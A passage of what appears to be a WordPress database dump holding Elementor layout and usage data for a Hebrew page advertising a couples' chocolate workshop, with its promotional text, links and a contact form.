i:2;s:14:\"padding_tablet\";i:3;s:14:\"padding_mobile\";i:3;s:7:\"padding\";i:2;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:5;s:11:\"header_size\";i:4;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:2;s:11:\"form_fields\";i:2;s:10:\"input_size\";i:2;s:11:\"show_labels\";i:2;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:2;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:2;s:10:\"email_from\";i:2;s:15:\"email_from_name\";i:2;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:2;s:12:\"email_from_2\";i:2;s:17:\"email_from_name_2\";i:2;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:2;s:13:\"error_message\";i:2;s:22:\"required_field_message\";i:2;s:15:\"invalid_message\";i:2;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}}'),(1690,65,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:3;s:11:\"header_size\";i:3;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:4;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}'),(1691,62,'_elementor_controls_usage','a:3:{s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:19:\"_inline_size_mobile\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:3:{s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}s:6:\"layout\";a:1:{s:14:\"section_layout\";a:1:{s:3:\"gap\";i:1;}}}}}'),(1692,59,'_elementor_controls_usage','a:3:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:1;s:19:\"_inline_size_mobile\";i:1;s:19:\"_inline_size_tablet\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:5:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:1;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:3:{s:6:\"margin\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}'),(1720,354,'_wp_page_template','elementor_header_footer'),(1721,354,'_elementor_edit_mode','builder'),(1722,354,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><div>\\u00a0<a style=\\\"font-size: 14px; background-color: #ffffff; width: 260px; color: #333333; text-decoration-line: underline; display: inline !important;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\"><span class=\\\"elementor-icon-list-text\\\" style=\\\"padding-right: 0px; display: inline !important;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/span><\\/a><\\/div><ul class=\\\"elementor-icon-list-items\\\" style=\\\"letter-spacing: normal; color: #333333; font-family: \'Arial Hebrew\', Arial, sans-serif;\\\"><li class=\\\"elementor-icon-list-item\\\" style=\\\"margin-top: calc(2.5px); padding-bottom: calc(2.5px); font-family: \'Open Sans Hebrew\', sans-serif; font-size: 14px;\\\"><span style=\\\"text-decoration: underline;\\\"><span style=\\\"color: #333333; text-decoration: underline;\\\"><a style=\\\"color: #333333; outline: 0px; width: 260px; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\"><span class=\\\"elementor-icon-list-text\\\" style=\\\"padding-right: 0px;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/span><\\/a><\\/span><\\/span><\\/li><li class=\\\"elementor-icon-list-item\\\" style=\\\"margin-top: calc(2.5px); font-family: \'Open Sans Hebrew\', sans-serif; font-size: 14px;\\\"><span style=\\\"text-decoration: underline;\\\"><span style=\\\"color: #333333; text-decoration: underline;\\\"><a style=\\\"width: 260px; color: #333333; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\"><span class=\\\"elementor-icon-list-text\\\" style=\\\"padding-right: 0px;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/span><\\/a><\\/span><\\/span><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder